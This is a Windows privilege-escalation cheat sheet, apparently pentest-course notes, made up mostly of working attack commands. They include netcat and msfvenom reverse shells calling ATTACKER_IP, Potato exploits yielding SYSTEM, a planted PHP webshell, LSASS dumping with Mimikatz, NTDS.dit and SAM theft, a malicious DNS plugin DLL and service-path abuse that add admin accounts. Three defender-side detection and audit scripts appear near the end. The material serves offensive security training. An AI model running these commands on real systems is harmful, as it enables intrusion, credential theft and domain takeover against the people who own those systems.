# Windows Privilege Abuse

## Recovered Local Admin Credentials

If you recover a valid local administrator password from configs, application storage, or credential hunting, use `runas` from a real `cmd.exe` prompt to start a process as that user.

Start a listener:

```bash
nc -nlvp 9001
```

From the target in `cmd.exe`:

```cmd
runas /user:Administrator "nc.exe -e cmd.exe ATTACKER_IP 9001"
```

Enter the recovered password when prompted:

```
Enter the password for Administrator:
Attempting to start nc.exe -e cmd.exe ATTACKER_IP 9001 as user "HOSTNAME\Administrator" ...
```

Successful callback:

```
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET]
Microsoft Windows [Version 10.0.19044.1645]
C:\WINDOWS\system32>
```

Notes:

* Run it from `cmd.exe`; this path may fail or behave differently from a PowerShell prompt.
* This requires an interactive password prompt. If you cannot interact with the prompt, use another credentialed execution path such as SMB/WinRM tooling when available.
* Confirm the spawned context with `whoami /all`.

## SeImpersonate / SeAssignPrimaryToken

### Overview

* Service accounts (IIS, MSSQL, etc.) often have SeImpersonatePrivilege
* Allows impersonating a privileged account such as NT AUTHORITY\SYSTEM
* "Potato" style attacks trick a SYSTEM process into connecting to our process, handing over its token

### Check for the Privilege

```cmd
whoami /priv
```

* Look for `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`

### JuicyPotato (< Windows Server 2019 / Win10 1809)

```cmd
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
```

### PrintSpoofer (Windows Server 2019+ / Win10 1809+)

```cmd
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
```

If PrintSpoofer finds `SeImpersonatePrivilege` but fails or times out, try another Potato family exploit instead of assuming the privilege is unusable.

#### XAMPP Apache webshell to SYSTEM

If a Windows XAMPP target lets a low-privileged user write into the web root, plant a PHP webshell to pivot into the Apache service account and check its token privileges.

Use `C:\xampp\htdocs` directly if `/uploads` is periodically moved or cleaned:

```powershell
cd C:\xampp\htdocs
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/simple-backdoor.php -UseBasicParsing -OutFile simple-backdoor.php
```

Confirm the Apache context and `SeImpersonatePrivilege` through the webshell:

```
http://TARGET/simple-backdoor.php?cmd=whoami
craft\apache

http://TARGET/simple-backdoor.php?cmd=whoami /all
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

Create a reverse shell payload, then upload it and PrintSpoofer into `htdocs`:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f exe -o shell.exe
```

```powershell
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/shell.exe -UseBasicParsing -OutFile C:\xampp\htdocs\shell.exe
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -UseBasicParsing -OutFile C:\xampp\htdocs\PrintSpoofer64.exe
```

Start a listener, then trigger PrintSpoofer from the Apache context:

```cmd
C:\xampp\htdocs\PrintSpoofer64.exe -c "C:\xampp\htdocs\shell.exe"
```

Successful shell:

```
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET] PORT
whoami
nt authority\system
```

### GodPotato

```cmd
GodPotato.exe -cmd "cmd.exe /c C:\path\to\shell.exe"
GodPotato.exe -cmd "cmd.exe /c net user admin admin123 /add"
GodPotato.exe -cmd "cmd.exe /c net localgroup Administrators admin /add"
```

Good indicators:

```
CurrentUser: NT AUTHORITY\NETWORK SERVICE
Find System Token : True
CurrentUser: NT AUTHORITY\SYSTEM
process start with pid <pid>
```

#### GodPotato service payload

If a direct reverse payload starts but dies, use GodPotato to create and start a service that runs as LocalSystem.

Create a service executable:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f exe-service -o service.exe
```

Stage a service creation script in the same writable directory as the payload:

```powershell
certutil.exe -urlcache -f http://ATTACKER_IP:8000/service.exe service.exe

echo 'sc create "meter" binPath= "C:\Windows\System32\spool\drivers\color\service.exe"' > service.bat
echo 'net start meter' >> service.bat
# check the script contents before running it
cat service.bat
```

Run the script through GodPotato:

```cmd
GodPotato.exe -cmd "cmd /c C:\Windows\System32\spool\drivers\color\service.bat"
```

Successful output:

```
CurrentUser: NT AUTHORITY\NETWORK SERVICE
Find System Token : True
CurrentUser: NT AUTHORITY\SYSTEM
[SC] CreateService SUCCESS
The meter service is starting
Meterpreter session opened
```

### PrintNotifyPotato

Use the .NET 4.6 build when available:

```cmd
PrintNotifyPotato-NET46.exe whoami
```

Successful indicators:

```
Create PrintNotify Success!
Got Token
CurrentUser: NT AUTHORITY\SYSTEM
DuplicateTokenEx Success!
process start with pid <pid>
```

### SigmaPotato

SigmaPotato can run privileged account-management commands:

```cmd
SigmaPotato.exe "net user ice-wzl Lab123 /add"
SigmaPotato.exe "net localgroup Administrators ice-wzl /add"
SigmaPotato.exe "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
```

Then authenticate remotely with the new local admin:

```bash
impacket-psexec ice-wzl:'Lab123'@TARGET
```

### RoguePotato

* Alternative to JuicyPotato for newer Windows versions
* <https://github.com/antonioCoco/RoguePotato>

### Common Scenario: MSSQL xp_cmdshell

```bash
mssqlclient.py sql_dev@10.129.43.30 -windows-auth
```

```
enable_xp_cmdshell
xp_cmdshell whoami /priv
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
```

## SeDebugPrivilege

### Overview

* Allows attaching to or opening any process, even those owned by SYSTEM
* Often assigned to developers for debugging
* Can dump LSASS for credential theft or spawn a SYSTEM child process

### Dump LSASS with ProcDump

```cmd
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

### Extract Hashes with Mimikatz

```
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
```

### Alternative: Task Manager LSASS Dump

* Details tab > right-click lsass.exe > "Create dump file"
* Download and process offline with Mimikatz

### RCE as SYSTEM via Parent Process

* Use psgetsys.ps1 to spawn a child process that inherits the token of a SYSTEM parent
* Target any process running as SYSTEM, such as winlogon.exe; the example below uses lsass.exe

```powershell
[MyProcess]::CreateProcessFromParent((Get-Process lsass).Id, "C:\Windows\System32\cmd.exe", "")
```

## SeTakeOwnershipPrivilege

### Overview

* Grants ability to take ownership of any securable object (files, folders, registry, services)
* Can read protected files by taking ownership then modifying ACLs

### Enable the Privilege

```powershell
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
```

### Take Ownership and Read File

```cmd
takeown /f "C:\Department Shares\Private\IT\cred.txt"
icacls "C:\Department Shares\Private\IT\cred.txt" /grant htb-student:F
type "C:\Department Shares\Private\IT\cred.txt"
```

### Interesting Files to Target

```
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```

## SeBackupPrivilege (Backup Operators Group)

### Overview

* Allows traversing any folder and copying files regardless of ACLs
* Must use `FILE_FLAG_BACKUP_SEMANTICS` flag (not standard copy)
* Members can log in locally to Domain Controllers

### Enable and Use

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
```

### Copy NTDS.dit from Domain Controller

```
diskshadow.exe
> set verbose on
> set metadata C:\Windows\Temp\meta.cab
> set context clientaccessible
> set context persistent
> begin backup
> add volume C: alias cdrive
> create
> expose %cdrive% E:
> end backup
> exit
```

```powershell
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```

```cmd
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```

### Extract Hashes

```bash
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```

```powershell
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```

### Domain Admin diskshadow

When you are already a domain administrator and want to obtain all domain hashes via diskshadow:

```
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

dir E:\Windows\NTDS\ntds.dit
copy E:\Windows\NTDS\ntds.dit \\TSCLIENT\tools\ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
copy SYSTEM.sav \\TSCLIENT\tools\SYSTEM.sav
impacket-secretsdump -ntds ntds.dit -system SYSTEM.sav LOCAL
```

### Robocopy Alternative

```cmd
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
```

## Event Log Readers Group

* Members can read the Security event log
* If process command-line auditing is enabled (Event ID 4688), command lines containing passwords may be recorded in the log

```powershell
wevtutil qe Security /rd:true /f:text | Select-String "/user"
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
```
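As an added defender-side triage (not from the original notes), the following PowerShell turns the 4688 search above into a report of which accounts had credentials exposed on a command line and which process leaked them, without printing the command lines themselves; the accounts listed are the ones to rotate and the processes the ones to fix. It assumes command-line auditing is enabled and the standard 4688 property order ([1] SubjectUserName, [2] SubjectDomainName, [5] NewProcessName, [8] CommandLine).

```powershell
# Pull every 4688 event; reading Security requires admin or Event Log Readers.
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
            -ErrorAction SilentlyContinue

# Keep only the metadata: who launched what, and which account name followed
# the "/user" switch. The command line itself (and any password on it) is
# deliberately not carried into the report.
$exposures = foreach ($e in $events) {
    $cmd = [string]$e.Properties[8].Value
    if ($cmd -match '/user:?\s*(?<acct>[^\s"]+)') {
        [pscustomobject]@{
            Time        = $e.TimeCreated
            RanBy       = "$($e.Properties[2].Value)\$($e.Properties[1].Value)"
            Process     = $e.Properties[5].Value
            ExposedUser = $Matches['acct']
        }
    }
}

# One row per exposed account: how often it appeared, from which processes,
# and when it was last seen.
$exposures | Group-Object ExposedUser | ForEach-Object {
    [pscustomobject]@{
        ExposedUser = $_.Name
        Count       = $_.Count
        Processes   = ($_.Group.Process | Sort-Object -Unique) -join ', '
        RanBy       = ($_.Group.RanBy | Sort-Object -Unique) -join ', '
        LastSeen    = $_.Group.Time | Sort-Object -Descending | Select-Object -First 1
    }
} | Format-Table -AutoSize
```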

## DnsAdmins Group

### Attack: Load Malicious DLL via DNS Service

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
sc stop dns
sc start dns
```

### Cleanup

```cmd
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
sc start dns
```

### WPAD Record Attack (Alternative)

```powershell
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
```

## Print Operators Group (SeLoadDriverPrivilege)

* Can load vulnerable kernel drivers (e.g., Capcom.sys)

```cmd
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
EnableSeLoadDriverPrivilege.exe
.\ExploitCapcom.exe
```

* Automate with EoPLoadDriver: `EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys`
* Note: Not exploitable since Windows 10 Version 1803

## Server Operators Group

* Members have SERVICE_ALL_ACCESS on many services
* Can modify service binary path and restart services

```cmd
sc config AppReadiness binpath= "cmd /c net localgroup Administrators server_adm /add"
sc start AppReadiness
```
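As an added detection script (not from the original notes), the following PowerShell checks a host for the three artifacts the DnsAdmins, Print Operators and Server Operators sections above leave behind: a DNS `ServerLevelPluginDll` value, a driver service key registered under HKCU, and service binPath values that launch a shell or account-management command instead of a service binary. Run it elevated on the server being checked; the suspicious-command regex and the HKCU scan are my assumptions, not from the notes.

```powershell
$findings = [System.Collections.Generic.List[string]]::new()

# 1. DnsAdmins: the DNS service loads whatever DLL this value names at its
#    next start, so any value here on a DC/DNS server needs a known owner.
$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$plugin = (Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll `
            -ErrorAction SilentlyContinue).ServerLevelPluginDll
if ($plugin) { $findings.Add("DNS ServerLevelPluginDll is set: $plugin") }

# 2. Print Operators / SeLoadDriverPrivilege: real drivers live under
#    HKLM\SYSTEM\CurrentControlSet\Services; the Capcom technique above writes
#    its ImagePath under HKCU instead, which is never legitimate.
$hkcuKeys = Get-ChildItem 'HKCU:\System\CurrentControlSet' -Recurse `
            -ErrorAction SilentlyContinue
foreach ($k in $hkcuKeys) {
    $img = (Get-ItemProperty -Path $k.PSPath -ErrorAction SilentlyContinue).ImagePath
    if ($img) { $findings.Add("Driver key under HKCU: $($k.PSPath) -> $img") }
}

# 3. Server Operators: a binPath should name a service executable, not cmd or
#    powershell, and never a 'net user' / 'net localgroup' command.
$shellLike = '(^|\\|\s|")(cmd|powershell|pwsh)(\.exe)?(\s|"|$)' +
             '|\bnet(\.exe)?\s+(user|localgroup)\b'
foreach ($svc in Get-CimInstance Win32_Service) {
    if ($svc.PathName -match $shellLike) {
        $findings.Add("Service '$($svc.Name)' binPath runs a command: $($svc.PathName)")
    }
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings }
```

Anything reported under 1 or 2 should be treated as confirmed tampering; item 3 can surface legitimate PowerShell-wrapped services, so verify each hit against change records.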

## Hyper-V Administrators

* Full access to all Hyper-V features
* If DCs are virtualized, treat members of this group as effectively Domain Admins
* Can clone live DC, mount virtual disk offline, extract NTDS.dit
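As an added defender-side audit (not part of the original notes), the following PowerShell consolidates the privileges and groups covered across this page into one check: which risky token privileges the current account holds, and which accounts sit in the risky built-in groups on the host. It assumes English `whoami /priv` output and the `Microsoft.PowerShell.LocalAccounts` module (Windows 10 / Server 2016 and later).

```powershell
# Token privileges the sections above show being escalated to SYSTEM.
$riskyPrivs = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
    'SeDebugPrivilege', 'SeTakeOwnershipPrivilege',
    'SeBackupPrivilege', 'SeLoadDriverPrivilege'
)
# Built-in groups whose membership is effectively admin-equivalent.
$riskyGroups = @(
    'Backup Operators', 'Event Log Readers', 'DnsAdmins',
    'Print Operators', 'Server Operators', 'Hyper-V Administrators'
)

# whoami /priv prints "Name  Description  State" rows (English locale assumed);
# keep the Se* name and whether the privilege is currently Enabled or Disabled.
# A Disabled privilege still counts: the token holds it and it can be enabled.
$held = whoami /priv | ForEach-Object {
    if ($_ -match '^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$') {
        [pscustomobject]@{ Name = $Matches[1]; State = $Matches[2] }
    }
}

Write-Host "== Risky privileges held by $env:USERDOMAIN\$env:USERNAME =="
$risky = $held | Where-Object { $riskyPrivs -contains $_.Name }
if ($risky) { $risky | Format-Table Name, State -AutoSize | Out-Host } else { Write-Host 'none' }

Write-Host "== Members of risky local groups on $env:COMPUTERNAME =="
$rows = foreach ($g in $riskyGroups) {
    # Groups absent on this host (DnsAdmins on a non-DNS server, Hyper-V
    # Administrators without the role) are skipped silently.
    $members = Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        [pscustomobject]@{ Group = $g; Member = $m.Name; Type = $m.ObjectClass }
    }
}
if ($rows) { $rows | Format-Table -AutoSize | Out-Host } else { Write-Host 'none' }
```

Run it in the context of each service account (IIS, MSSQL, DNS) to see which of the paths on this page that account could take; a service account that does not need SeImpersonatePrivilege can have it removed through the service's configured rights.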
